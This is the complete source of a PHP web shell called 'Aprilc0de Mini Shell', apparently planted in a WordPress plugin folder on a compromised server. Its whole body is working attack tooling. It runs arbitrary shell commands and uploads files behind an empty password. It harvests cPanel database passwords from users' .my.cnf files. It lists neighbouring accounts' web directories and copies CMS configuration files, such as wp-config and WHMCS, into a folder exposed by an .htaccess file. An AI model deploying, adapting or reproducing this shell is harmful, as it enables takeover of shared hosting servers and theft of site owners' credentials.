Current File : //var/www/html/wordpress/wp-content/plugins/KRKq5KCg7nQ7v0440hJKwa/src/ui/c.php

<?php
error_reporting(0);
?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
"http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<title>Aprilc0de Mini Shell</title>
<link href="http://fonts.googleapis.com/css?family=Squada+One" rel="stylesheet" type="text/css">
<style>
body {background:#fff;color:#F7C630;padding-left:5px;padding-right:5px;font-family:Squada One;}
a {text-decoration:none;color:#2F706C;}
.aa {border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
textarea {background:#fff;font-family:Squada One;border:1px solid #2D1F3B;margin:3px;padding:2px;height:200px;width:300px;color:#036564}
input[type=submit] {background:none;font-family:Squada One;color:#AE8FBA;border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
.t {color:#AE8FBA}
input[type=file], input[type=text], input[type=password] {background:#fff;font-family:Squada One;color:#036564;border:1px solid #2D1F3B;margin:3px;padding:2px;height:21px;width:300px;}
</style>

<?php
// Coded By UstadCage_48 - Aprilc0de
// 100% ?? tentu tidak lah bro
// Default pas [x48]
// fb853cd86dc5cccd63690f6b93ccd15e
$pass="";
session_start();
error_reporting(0);
function ustad(){
echo '<center>&#8226; Aprilc0de Mini Shell &#8226;<br><form action="" method="post">
<input type="password" style="width:250px" name="pass" value="" /> 	<input type="submit" value=" >> " name="submitlogin" /> 	
</form></center>';
exit; 
} 

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) 
if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
else 
ustad();
 if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); }

if($_GET['path']){
	$path = $_GET['path'];
} else {
	$path = getcwd();
}
error_reporting(0);
$dir = str_replace('\\','/',$path);
$paths = explode('/',$dir);
$uname = php_uname();
$os = PHP_OS;
$ip = $_SERVER['SERVER_ADDR'];
$id = getmyuid().'/'.getmygid();
$soft = $_SERVER['SERVER_SOFTWARE'];
$ver = phpversion();
if(ini_get('safe_mode')==0){ $sm = "<font color='#EA5A6A'>OFF</font>"; } else { $sm = "ON"; }
if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "<font color='#EA5A6A'>OFF</font>"; } else { $mq = "ON"; }

function exe($cmd){
	if(function_exists('system')) {
		@ob_start();
		@system($cmd);
		$buff = @ob_get_contents();
		@ob_end_clean();
		return $buff;
	}
	elseif(function_exists('exec')) {
		@exec($cmd,$results);
		$buff = "";
		foreach($results as $result){
			$buff .= $result;
		}
		return $buff;
	}
	elseif(function_exists('passthru')) {
		@ob_start();
		@passthru($cmd);
		$buff = @ob_get_contents();
		@ob_end_clean();
		return $buff;
	}
	elseif(function_exists('shell_exec')){
		$buff = @shell_exec($cmd);
		return $buff;
	}
}

if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "<font color='#EA5A6A'>OFF</font>"; }
if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "<font color='#EA5A6A'>OFF</font>"; }
if(exe('wget --help')) { $wget = "ON"; } else {  $wget = "<font color='#EA5A6A'>OFF</font>"; }
if(exe('perl -h')) { $perl = "ON"; } else {  $perl = "<font color='#EA5A6A'>OFF</font>"; }
if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "<font color='#EA5A6A'>OFF</font>"; }

echo "<br>&#8362; Aprilc0de Mini Shell<br>&#8362; <font color='#629454'>UNAME :</font> $uname <br>";
echo "&#8362; <font color='#629454'>IP :</font> $ip $soft $os $ver ( $id )<br>";
echo "&#8362; <font color='#629454'>SAFEMOD :</font> $sm &#8227; <font color='#629454'>MAGIC :</font> $mq &#8227; <font color='#629454'>MYSQL :</font> $mysql  &#8227; <font color='#629454'>DISFUNC :</font> $df &#8227; <font color='#629454'>CURL :</font> $curl &#8227; <font color='#629454'>WGET :</font> $wget<br>";

echo "&#8362; <font color='#629454'>PATH :</font> ";
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a style="color:#F7C630;" href="?path=/"> &#8227; </a>';
continue;
}
if($pat == '') continue;
echo '<a class="t" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a> &#8227; ';
}
echo "<br><br><center><a class='aa' href='?upload&path=$path'>Upload</a> <a class='aa'  href='?jumping&path=$path'>Jumper</a> <a class='aa'  href='?config'>Config</a> <a class='aa'  href='?cpcrack'>CpCrack</a></center><br>";

if(isset($_GET['cpcrack'])){
	
	function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

echo '<br><br>';
 
echo "<center>";
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");

if ($domains or $d0mains)
{
    $domains = scandir("/var/named");
    if($domains) {
echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/.my.cnf';
$path = getcwd();
 
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'> >> </a></td></tr>";
$dc++;
}
}
}
echo '</table>';
$total = $dc;
echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
echo '</center>';
}else{
$d0mains = @file('/etc/named.conf');
    if($d0mains) {
echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
    if(@eregi('zone',$d0main)){
        preg_match_all('#zone "(.*)"#',$d0main,$domain);
        flush();
        if(strlen(trim($domain[1][0])) >2){
            $mck[] = $domain[1][0];
        }
    }
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
    $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
    $usr[] = $infos['name'];
    $dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
    $r = explode(':',$d);
    if(strpos($r[5],'home')) {
        $passwd[$r[0]] = $r[5];
    }
}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'> >> </a></td></tr>";
$dc++;
                flush();
                $l=$l?0:1;
                $j++;
                                }
            }
                        }
echo '</table>';
$total = $dc;
echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
echo '</center>';
 
}
}else{
echo "</center><font color='#629454'>ERROR : </font>/var/named or etc/named.conf Not Accessible!";
}
	exit;
	
	}

if(isset($_GET['view'])){
	echo "<center><textarea>".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."</textarea></center>";
	exit;
}
if(isset($_GET['jumping'])){
	 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><font color="#AE8FBA">Error: safe_mode = on</font>');
	set_time_limit(0);
	@$passwd = fopen('/etc/passwd','r');
	if (!$passwd) { die('<br><font color="#AE8FBA">Error : coudn`t read /etc/passwd</font>'); }
	$pub = array();
	$users = array();
	$conf = array();
	$i = 0;
	while(!feof($passwd))
	{
	$str = fgets($passwd);
	if($i>35){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if(($username != '')){
if(is_readable($dirz)){
array_push($users,$username);
array_push($pub,$dirz);
}}}
$i++;
}
echo "<br>&#8227; <font color='#629454'>Total :</font> ".sizeof($users)."/".sizeof($pub)." User";
echo "<br><br>";
foreach($users as $user){
$path = "/home/$user/public_html/";
echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
echo "&#8226; <a href='?path=$path'>$path</a><br>";
echo " </td></tr></table> ";
}
exit;
}
// config by Indoxploit
if(isset($_GET['config']))
{
$etc = fopen("/etc/passwd", "r");
$idx = mkdir("aprilc0de", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("aprilc0de/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=#AE8FBA>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_idx){
$user_config_dir = "/home/$user_idx/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cpanel",
"/home/$user_idx/.accesshash" => "WHM-accesshash",
"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/forum/config.php" => "phpBB",
"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_idx/public_html/configuration.php" => "Joomla",
"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/admin/config.php" => "OpenCart",
"/home/$user_idx/public_html/slconfig.php" => "Sitelok",
"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config){
$ambil_config = file_get_contents($config);
if($ambil_config == ''){
} else {
$file_config = fopen("aprilc0de/$user_idx-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}}}	}}}
$path = getcwd();
echo "&#8227;<font color='629454'> Done :</font> <a href='?beby=exploler&path=$path$dir/aprilc0de'>Click Here</a>";
exit;
}
// uploader
if(isset($_GET['upload'])){
	$path = $_GET['path'];
echo '<center><form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" /><br>
<input type="text" name="ufile" placeholder="jkt48.php" /><br>
<input name="upload" type="submit" value="Upload" /> <input type="submit" value="Reset" /> </form></center>';

if(isset($_REQUEST['ufile'])){
$ufile = $_POST['ufile'];
}
if(isset($_REQUEST['upload'])){
if($_POST['upload']){
if(@copy($_FILES['file']['tmp_name'],$path.'/'.$ufile)){
	$size  = filesize($ufile);
	echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Suksess !!\n\t [+] Path : '.$path.'/'.$ufile.'")</script>';
	echo "&#8227;<font color='#629454'> Sucess :</font> <a href='#'>$ufile</a>";
} else {
$size  = filesize($ufile);
	echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Gagall !!!\n\t [+] Path : '.$path.'/'.$ufile.' ")</script>';
	echo "&#8227;<font color='629454'> Gagal :</font> <a href='#'>$ufile</a>";
}}}

exit;
}



// scandir
$files = scandir ($path);
$direct = 0;
foreach ($files as $out) {
if(!is_dir("$path/$out") || $out == '.' || $out == '..') continue;
echo '&#8226; <a href="?path='.$path.'/'.$out.'">'.$out.'</a><br>';
}
if(is_dir($path)){
foreach ($files as $out) {
if(!is_file("$path/$out") || $out == '.' || $out == '..') continue;
echo '&#8226; <a href="?view&path='.$path.'&get='.$path.'/'.$out.'&filename='.$out.'">'.$out.'</a><br>';
}
} 
?>
<br>
&copy; Copyright 2018 UstadCage_48
</html>